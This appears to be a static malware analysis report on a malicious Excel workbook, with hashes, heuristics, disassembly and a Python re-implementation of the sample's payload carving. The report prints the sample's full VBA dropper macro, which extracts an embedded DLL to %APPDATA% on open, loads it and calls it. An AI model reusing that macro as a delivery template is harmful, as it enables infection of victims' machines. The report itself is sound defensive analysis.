Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7925423fd0655133…

MALICIOUS

Office (OLE)

Size: 718.5 KB
Created: 2019-08-30 09:14:50
Authoring application: Microsoft Excel
First seen: 2020-02-04
MD5: bffcd7de429220cb8225de11212e0ef8
SHA-1: f1e76fa18d167a8eece411f90d5a4e9600362d91
SHA-256: 7925423fd0655133ec7b1eff6ba1705354cfbbace668bc2b21aec11d06f414e2
Risk score: 496

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic; T1566.001 Spearphishing Attachment; T1027 Obfuscated Files or Information; T1574.001 DLL Search Order Hijacking (the analyzer emitted this name under T1137.003, which is Office Application Startup: Outlook Forms; the correct ID for DLL Search Order Hijacking is T1574.001, and since the macro loads its own dropped DLL by full path, T1129 Shared Modules describes the observed behaviour more precisely). The analyzer's T1105 Ingress Tool Transfer tag is not supported by the extracted macro: the payload is embedded in the document and nothing is downloaded.

The sample is an Excel workbook whose Workbook_Open macro shows UserForm1; the form's Activate event calls ReplaceCurrentModule. That routine copies the sheets into a new workbook, saves it as %TEMP%\factory.xlsx (FileFormat 51, Open XML, so the copy is macro-free but still carries the embedded OLE object), duplicates it as factory.xlsx.zip and uses Shell.Application CopyHere to lift xl\embeddings\oleObject1.bin out of the archive. Resoration then reads that object byte by byte for the num-th occurrence of the triple 50+27, 50+40, 50+94 = 0x4D 0x5A 0x90 ("MZ\x90", the start of a DOS header) and writes that marker plus the bytes that follow, 223232 bytes in total on 32-bit Excel (first hit) or 284672 bytes on 64-bit Excel (second hit), to %APPDATA%\map_studio1.dll or %APPDATA%\map_studio2.dll; in other words it carves the matching DLL out of the Ole10Native payload without parsing the OLE container. The DLL is loaded with LoadLibraryW by full path and its export SuS is invoked through the Declare binding. The two ExecuteExcel4Macro calls only run MESSAGE(False, "Debug"), a status-bar reset that carries no payload. map_studio1.dll and map_studio2.dll are therefore the dropped payload itself rather than a hijacked legitimate library, and no network download takes place.

Heuristics (13)

  • ClamAV: Xls.Malware.Sdrop-7173293-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Sdrop-7173293-0
  • Embedded PE executable critical OLE_EMBEDDED_EXE
    MZ/PE header found inside document — possible embedded executable
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA ActiveX event launches decoded Excel4 macro critical OLE_VBA_ACTIVEX_XLM_STAGER
    The compiled VBA p-code (identifier table) references an auto-firing ActiveX/control event together with ExecuteExcel4Macro, a combination the detector associates with VBA stomping (p-code that no longer matches the decompressed source) and with the ActiveX-event XLM stager, in which a control event bridges into XLM formula execution to call Win32 or drop payloads out of sight of source-level scanners. Caveat for this sample: the decompressed source shown below does contain both ExecuteExcel4Macro calls, and the only XLM formula they run is MESSAGE(False, "Debug"), which resets the status bar and carries no payload; the stage that drops and loads the DLL is plain VBA reached through UserForm1's Activate event, so the p-code/source discrepancy this heuristic describes is not borne out by the extracted macro.
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
            Set oApp = CreateObject("Shell.Application")
            oApp.Namespace(ZipFolder).CopyHere oApp.Namespace(ZipName).items.Item("xl\embeddings\oleObject1.bin")
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()
    ExecuteExcel4Macro "MESSAGE(False, ""Debug"")"
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    UserForm2.TextBox1.Tag = Environ("TEMP")
    UserForm2.TextBox2.Tag = Environ("APPDATA")
  • PEB access via FS segment (x86) high SC_PEB_ACCESS
    Reads the PEB through fs:[0x30] and tests NtGlobalFlag. The bit tested is 0x100 (FLG_APPLICATION_VERIFIER), which is the MSVC C runtime's own check, not the 0x70 debugger-flags mask that hand-written anti-debug code looks for, so this indicator is weak on its own.
    Disassembly
    Attempted x86 opcode disassembly
    00016895  64a130000000      mov eax, dword ptr fs:[0x30]      ; TEB -> PEB
    0001689B  8b4068            mov eax, dword ptr [eax + 0x68]   ; PEB.NtGlobalFlag (x86 offset 0x68)
    0001689E  c1e808            shr eax, 8
    000168A1  a801              test al, 1                        ; bit 0x100 = FLG_APPLICATION_VERIFIER
    000168A3  7510              jne 0x168b5
    000168A5  ff7508            push dword ptr [ebp + 8]
    000168A8  ff1508410210      call dword ptr [0x10024108]       ; IAT slot, unresolved in this static pass
    000168AE  50                push eax
    000168AF  ff150c410210      call dword ptr [0x1002410c]
    000168B5  ff7508            push dword ptr [ebp + 8]
    000168B8  e84f000000        call 0x1690c
    000168BD  59                pop ecx
    000168BE  ff7508            push dword ptr [ebp + 8]
    000168C1  ff153c410210      call dword ptr [0x1002413c]
    000168C7  cc                int3                              ; padding: the preceding call does not return
    000168C8  6a00              push 0                            ; next function: import called with a NULL argument
    000168CA  ff15d8400210      call dword ptr [0x100240d8]
    000168D0  8bc8              mov ecx, eax
    000168D2  85c9              test ecx, ecx
    000168D4  7503              jne 0x168d9
    000168D6  32c0              xor al, al                        ; return FALSE
    000168D8  c3                ret
    000168D9  b84d5a0000        mov eax, 0x5a4d                   ; 'MZ'
    000168DE  663901            cmp word ptr [ecx], ax            ; IMAGE_DOS_HEADER.e_magic
    000168E1  75f3              jne 0x168d6
    000168E3  8b413c            mov eax, dword ptr [ecx + 0x3c]   ; e_lfanew
    000168E6  03c1              add eax, ecx
    000168E8  813850450000      cmp dword ptr [eax], 0x4550       ; 'PE\0\0'
    000168EE  75e6              jne 0x168d6
    000168F0  b90b010000        mov ecx, 0x10b                    ; IMAGE_NT_OPTIONAL_HDR32_MAGIC (PE32), compared next
    Reading: the first routine is the compiler-emitted MSVC CRT test for Application Verifier, and the function at 0x168C8 validates a module base exactly as the CRT's _ValidateImageBase (pesect.c) does: MZ, e_lfanew to PE\0\0, then the optional-header magic. Treat SC_PEB_ACCESS here as C runtime boilerplate inside the carved DLL, not as evidence of hand-written shellcode.
  • PEB access via GS segment (x64) high SC_PEB_ACCESS_X64
    Reads the PEB through gs:[0x60] and tests NtGlobalFlag; this is the 64-bit build of the same MSVC C runtime FLG_APPLICATION_VERIFIER check as the x86 finding (bit 0x100, not the 0x70 debugger-flags mask), so it carries the same weight.
    Disassembly
    Attempted x86 opcode disassembly
    00053603  65488b042560000000  mov rax, qword ptr gs:[0x60]     ; TEB -> PEB
    0005360C  8b90bc000000      mov edx, dword ptr [rax + 0xbc]    ; PEB.NtGlobalFlag (x64 offset 0xbc)
    00053612  c1ea08            shr edx, 8
    00053615  f6c201            test dl, 1                         ; bit 0x100 = FLG_APPLICATION_VERIFIER
    00053618  7511              jne 0x5362b
    0005361A  ff15e6140100      call qword ptr [rip + 0x114e6]     ; IAT slot, unresolved in this static pass
    00053620  488bc8            mov rcx, rax
    00053623  8bd3              mov edx, ebx
    00053625  ff15e3140100      call qword ptr [rip + 0x114e3]
    0005362B  8bcb              mov ecx, ebx
    0005362D  e80c000000        call 0x5363e                       ; callee is the function at 0x5363e below
    00053632  8bcb              mov ecx, ebx
    00053634  ff153c150100      call qword ptr [rip + 0x1153c]
    0005363A  cc                int3                               ; four int3: inter-function padding, not a breakpoint trap
    0005363B  cc                int3
    0005363C  cc                int3
    0005363D  cc                int3
    0005363E  48895c2408        mov qword ptr [rsp + 8], rbx       ; function entered from 0x5362d (prologue)
    00053643  57                push rdi
    00053644  4883ec20          sub rsp, 0x20
    00053648  488364243800      and qword ptr [rsp + 0x38], 0      ; zero a local that is passed by address in r8
    0005364E  4c8d442438        lea r8, [rsp + 0x38]
    00053653  8bf9              mov edi, ecx
    00053655  488d15ea9d0100    lea rdx, [rip + 0x19dea]           ; rip-relative data, likely a string
    0005365C  33c9              xor ecx, ecx
    0005365E  ff151a1501..      call qword ptr [rip + ...]         ; truncated: the 6-byte call runs past the end of the disassembly window, so its last displacement byte (and the target) is unrecoverable here
    Reading: the control flow is the x64 twin of the x86 listing above (NtGlobalFlag test, two import calls, a local call, a non-returning call), i.e. the same compiler-emitted CRT routine in the 64-bit DLL.
  • Reference to CreateProcess API high SC_STR_CREATEPROCESS
    Reference to CreateProcess API
  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • Reference to GetProcAddress API high SC_STR_GETPROCADDRESS
    Reference to GetProcAddress API
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6837 bytes
SHA-256: cbee3f708df6ef158f6df933d4e20e53bb6ed05cfa98ab90e9d1694719e58150
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "wbO"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Private Sub Workbook_Open()
ExecuteExcel4Macro "MESSAGE(False, ""Debug"")"

UserForm2.TextBox1.Tag = Environ("TEMP")
UserForm2.TextBox2.Tag = Environ("APPDATA")

ChDir (Environ("TEMP"))

    UserForm1.show
ExecuteExcel4Macro "MESSAGE(False, ""Debug"")"
End Sub


Attribute VB_Name = "Page1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
#If Win64 Then
    Public Declare PtrSafe Function SuS Lib _
        "map_studio2.dll" () As Integer
    Public Declare PtrSafe Function SuS2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long
#Else
   Public Declare Function SuS2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long
     Public Declare Function SuS Lib _
        "map_studio1.dll" () As Integer
#End If
        

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{A4D27385-A868-4108-A866-253E8A4BC04B}{5E8B384E-1A8A-457D-A73B-F803DEE10042}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub Label1_Click()

End Sub

Private Sub UserForm_Activate()
DoEvents
ReplaceCurrentModule
End Sub

Private Sub UserForm_Initialize()
Call SystemButtonSettings(Me, False)

End Sub

Attribute VB_Name = "Module2"
Private Const GWL_STYLE = -16
Private Const WS_CAPTION = &HC00000
Private Const WS_SYSMENU = &H80000

#If VBA7 Then

    Private Declare PtrSafe Function GetWindowLong _
        Lib "user32" Alias "GetWindowLongA" (ByVal hWnd As Long, _
        ByVal nIndex As Long) As Long
    Private Declare PtrSafe Function SetWindowLong _
        Lib "user32" Alias "SetWindowLongA" (ByVal hWnd As Long, _
        ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
    Private Declare PtrSafe Function FindWindowA _
        Lib "user32" (ByVal lpClassName As String, _
        ByVal lpWindowName As String) As Long
    Private Declare PtrSafe Function DrawMenuBar _
        Lib "user32" (ByVal hWnd As Long) As Long
        
#Else

    Private Declare Function GetWindowLong _
        Lib "user32" Alias "GetWindowLongA" ( _
        ByVal hWnd As Long, ByVal nIndex As Long) As Long
    Private Declare Function SetWindowLong _
        Lib "user32" Alias "SetWindowLongA" ( _
        ByVal hWnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
    Private Declare Function FindWindowA _
        Lib "user32" (ByVal lpClassName As String, _
        ByVal lpWindowName As String) As Long
    Private Declare Function DrawMenuBar _
        Lib "user32" (ByVal hWnd As Long) As Long
  
#End If

Public Sub SystemButtonSettings(frm As Object, show As Boolean)
Dim windowStyle As Long
Dim windowHandle As Long

windowHandle = FindWindowA(vbNullString, frm.Caption)
windowStyle = GetWindowLong(windowHandle, GWL_STYLE)

If show = False Then

    SetWindowLong windowHandle, GWL_STYLE, (windowStyle And Not WS_SYSMENU)

Else

    SetWindowLong windowHandle, GWL_STYLE, (windowStyle + WS_SYSMENU)

End If

DrawMenuBar (windowHandle)

End Sub




Public Sub KillArray(ParamArray PathList() As Variant)
    On Error Resume Next
    For Each Key In PathList
        Kill Key
    Next Key
    On Error GoTo 0
End Sub




Public Sub Resoration(s As String, nm As String, fl As Long, num As Integer)
    Dim intFileNum As Long, bytTemp1 As Byte, bytTemp2 As Byte, bytTemp3 As Byte
    Dim DataArray() As Long

    ReDim DataArray(1 To fl)
    DataArray(1) = CByte(50 + 27)
    DataArray(2) = CByte(50 + 40)
    DataArray(3) = CByte(50 + 94)
    
    intFileNum = FreeFile
    Open s For Binary Access Read As intFileNum
    Dim cur As Integer
    cur = 1
    Do While Not EOF(intFileNum)
        Get intFileNum, , bytTemp1
        If bytTemp1 = DataArray(1) Then
           Get intFileNum, , bytTemp2
           If bytTemp2 = DataArray(2) Then
                Get intFileNum, , bytTemp3
                If bytTemp3 = DataArray(3) Then
                     If cur = num Then
                        For k = 4 To fl
                            Get intFileNum, , bytTemp1
                            DataArray(k) = bytTemp1
                            Next k
                         Exit Do
                     Else
                        cur = cur + 1
                     End If
                End If
           End If
        End If
    Loop
    Close intFileNum
    
    intFileNum = FreeFile
    Open nm For Binary Lock Read Write As #intFileNum
    For i = LBound(DataArray) To UBound(DataArray)
        Put #intFileNum, , CByte(DataArray(i))
    Next i

    Close #intFileNum
End Sub



Attribute VB_Name = "Module3"


Public Sub ReplaceCurrentModule()
    TempName = UserForm2.TextBox1.Tag & "\factory.xlsx"
    ZipName = TempName + ".zip"
    ZipFolder = UserForm2.TextBox1.Tag '& "\UnzTmp"
    Dim nm As String
    Dim size As Long
    Dim num As Integer
#If Win64 Then
    nm = UserForm2.TextBox2.Tag + "\map_studio2.dll"
    size = 284672
    num = 2
#Else
    
    nm = UserForm2.TextBox2.Tag + "\map_studio1.dll"
    size = 223232
    num = 1
#End If
        
        KillArray ZipFolder & "\oleObj" + "ect*.bin", ZipName, nm
        
    DoEvents
        ThisWorkbook.Sheets.Copy
        Application.DisplayAlerts = False
        ActiveWorkbook.SaveAs TempName, FileFormat:=51
    DoEvents
    ActiveWorkbook.Close
    DoEvents
        
    
        FileCopy TempName, ZipName
        
        Set oApp = CreateObject("Shell.Application")
        oApp.Namespace(ZipFolder).CopyHere oApp.Namespace(ZipName).items.Item("xl\embeddings\oleObject1.bin")
        Resoration ZipFolder + "\oleObject1.bin", nm, size, num
        
        ChDir (UserForm2.TextBox2.Tag)
        No_SuS = SuS2(nm)
        SuS

End Sub


Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{2FAC5915-C2ED-4245-9227-271C613DF8A6}{03709D13-8260-4EB0-8DC9-7CED58E1E30C}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
embedded_office_00003cde.exe | embedded-pe | Office MZ+PE at offset 0x3CDE | 720162 bytes
SHA-256: 881f1edad89d66f1489f9ce9a65ede84e1a4ffe4c4434d9c612457765dd9169b
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: SC_PEB_ACCESS, SC_STR_CREATEPROCESS, SC_STR_GETPROCADDRESS. Recovered API/import strings: kernel32.dll, advapi32.dll, KERNEL32.DLL, ADVAPI32.DLL, CreateProcessW, GetProcAddress. The carved macro source contains an auto-exec entry point and execution/download terms.
Caveat: 0x3CDE (15582) + 720162 = 735744 bytes = 718.5 KB, the full length of the sample, so this artifact is an MZ-to-end-of-file carve rather than a PE bounded by its headers. It overlaps the Ole10Native stream below (same indicators and the same recovered strings), and its SHA-256 identifies this carve, not a file that will be found on a victim's disk; the on-disk payloads are the 223232-byte and 284672-byte DLLs the macro writes to %APPDATA%.
ole10native_00.bin | ole-package | OLE Ole10Native stream: MBD0006BC6F/Ole10Native | 517134 bytes
SHA-256: d2dafd678bdbf552f620a6661ebf2886be460361d5095dfbdc3aa91bddfc6bc8
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: SC_PEB_ACCESS, SC_STR_CREATEPROCESS, SC_STR_GETPROCADDRESS. Recovered API/import strings: kernel32.dll, advapi32.dll, KERNEL32.DLL, ADVAPI32.DLL, CreateProcessW, GetProcAddress.
Note: this stream is the payload the macro reaches after extracting xl\embeddings\oleObject1.bin. The 223232-byte x86 DLL and the 284672-byte x64 DLL that Resoration carves from it total 507904 bytes, which fits inside the 517134-byte stream with room for the Ole10Native header and padding; the two DLLs are not carved as separate artifacts in this report, so their hashes are not listed here.
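Added worked example (not the analyzer's output and not code from the sample): a Python re-implementation of what the extracted macro and the disassembly show in pieces. carve_like_macro() reproduces Resoration's byte-at-a-time scan for the n-th 0x4D 0x5A 0x90 marker (hit 1 for map_studio1.dll, hit 2 for map_studio2.dll, including the macro's quirk that bytes consumed by a partial match are never re-examined). pe_info() applies the same MZ / PE\0\0 / optional-header-magic checks as the CRT stub in the PEB-access listing and goes one step further by reading the machine type and bounding the image with its section table, so a carved DLL can be sized without the macro's hard-coded 223232/284672 and without an MZ-to-EOF carve like embedded_office_00003cde.exe. The container built by build_container() is constructed test data: a real Ole10Native stream has a different header, and all function and variable names are the example's own.

```python
"""Added example, not code from the analyzer or from the sample.

Re-implements the sample's carve (Resoration) and the image validation seen in
the disassembled CRT stub, then sizes the carved DLL from its section table.
build_container() fabricates a stand-in for the Ole10Native payload.
"""
from __future__ import annotations
import struct

# Resoration's DataArray(1..3): 50+27, 50+40, 50+94 -> 0x4D 0x5A 0x90, the first
# bytes of a typical DOS header ("MZ" followed by e_cblp = 0x90).
MARKER = bytes([50 + 27, 50 + 40, 50 + 94])
IMAGE_FILE_MACHINE_I386, IMAGE_FILE_MACHINE_AMD64 = 0x14C, 0x8664
IMAGE_FILE_DLL, PE32_MAGIC, PE32PLUS_MAGIC = 0x2000, 0x10B, 0x20B


def carve_like_macro(blob: bytes, occurrence: int, length: int) -> bytes | None:
    """`length` bytes from the `occurrence`-th marker hit, scanned the way the macro does.

    The macro Gets one byte and only on a match Gets the next, so bytes consumed by a
    partial match are never re-examined (b"MMZ\\x90" is missed). Reproduced on purpose.
    """
    i, hits, n = 0, 0, len(blob)
    while i < n:
        b1, i = blob[i], i + 1
        if b1 != MARKER[0] or i >= n:
            continue
        b2, i = blob[i], i + 1
        if b2 != MARKER[1] or i >= n:
            continue
        b3, i = blob[i], i + 1
        if b3 != MARKER[2]:
            continue
        hits += 1
        if hits == occurrence:
            return blob[i - 3:i - 3 + length]
    return None


def pe_info(image: bytes) -> dict | None:
    """Same checks as the disassembled stub (MZ, PE\\0\\0, magic 0x10b/0x20b), plus the
    machine type, the DLL flag and the file size implied by the section table."""
    try:
        if len(image) < 0x40 or image[:2] != b"MZ":
            return None
        e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
        if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
            return None
        machine, nsections, _, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", image, e_lfanew + 4)
        magic = struct.unpack_from("<H", image, e_lfanew + 24)[0]  # [nt_hdr + 0x18] in the listing
        if magic not in (PE32_MAGIC, PE32PLUS_MAGIC):
            return None
        sections = e_lfanew + 24 + opt_size
        end = 0
        for k in range(nsections):  # SizeOfRawData / PointerToRawData sit at +16 in each 40-byte header
            raw_size, raw_ptr = struct.unpack_from("<II", image, sections + 40 * k + 16)
            end = max(end, raw_ptr + raw_size)
    except struct.error:
        return None
    return {"machine": machine, "magic": magic, "is_dll": bool(chars & IMAGE_FILE_DLL), "bounded_size": end}


def build_fake_pe(machine: int, magic: int, body: bytes) -> bytes:
    """Constructed minimal PE: one .text section, no imports, just enough header for pe_info()."""
    opt_size = 0xE0 if magic == PE32_MAGIC else 0xF0
    dos = bytearray(0x40)
    dos[:4] = b"MZ\x90\x00"
    struct.pack_into("<I", dos, 0x3C, 0x40)                         # e_lfanew
    raw_ptr = 0x40 + 4 + 20 + opt_size + 40                         # headers end here
    coff = struct.pack("<HHIIIHH", machine, 1, 0, 0, 0, opt_size, IMAGE_FILE_DLL | 0x0002)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, magic)
    sect = b".text\0\0\0" + struct.pack("<IIIIIIHHI", len(body), 0x1000, len(body), raw_ptr, 0, 0, 0, 0, 0x60000020)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + sect + body


def build_container() -> tuple[bytes, bytes, bytes]:
    """Constructed stand-in for the Ole10Native stream: header bytes, x86 DLL, padding, x64 DLL, tail."""
    x86 = build_fake_pe(IMAGE_FILE_MACHINE_I386, PE32_MAGIC, b"\xcc" * 0x80)
    x64 = build_fake_pe(IMAGE_FILE_MACHINE_AMD64, PE32PLUS_MAGIC, b"\xcc" * 0xC0)
    header = b"\x02\x00" + b"payload.bin\0" * 2 + b"\x00\x00"       # not a real Ole10Native header
    return header + x86 + b"\x00" * 9 + x64 + b"\x00" * 0x20, x86, x64


def triage(container: bytes) -> dict:
    """Do what ReplaceCurrentModule does for both architectures (hit 1 -> map_studio1.dll,
    hit 2 -> map_studio2.dll) but size each DLL from its section table and report how far
    an MZ-to-EOF carve would over-read."""
    result = {}
    for name, occurrence in (("map_studio1.dll", 1), ("map_studio2.dll", 2)):
        to_eof = carve_like_macro(container, occurrence, len(container))
        info = pe_info(to_eof) if to_eof else None
        if info is None:
            result[name] = None
            continue
        result[name] = {
            "arch": "x64" if info["machine"] == IMAGE_FILE_MACHINE_AMD64 else "x86",
            "is_dll": info["is_dll"],
            "bounded": info["bounded_size"],
            "eof_carve": len(to_eof),
            "image": to_eof[:info["bounded_size"]],
        }
    return result


if __name__ == "__main__":
    container, _, _ = build_container()
    for name, r in triage(container).items():
        print(name, None if r is None else {k: v for k, v in r.items() if k != "image"})
```

To use it on the real object, replace build_container() with the bytes of the carved Ole10Native stream (or of oleObject1.bin pulled from the .xlsx copy the macro makes) and compare each bounded image's length with the macro's 223232 and 284672; a mismatch means either padding the macro deliberately includes or a different payload than the one the Declare statements expect.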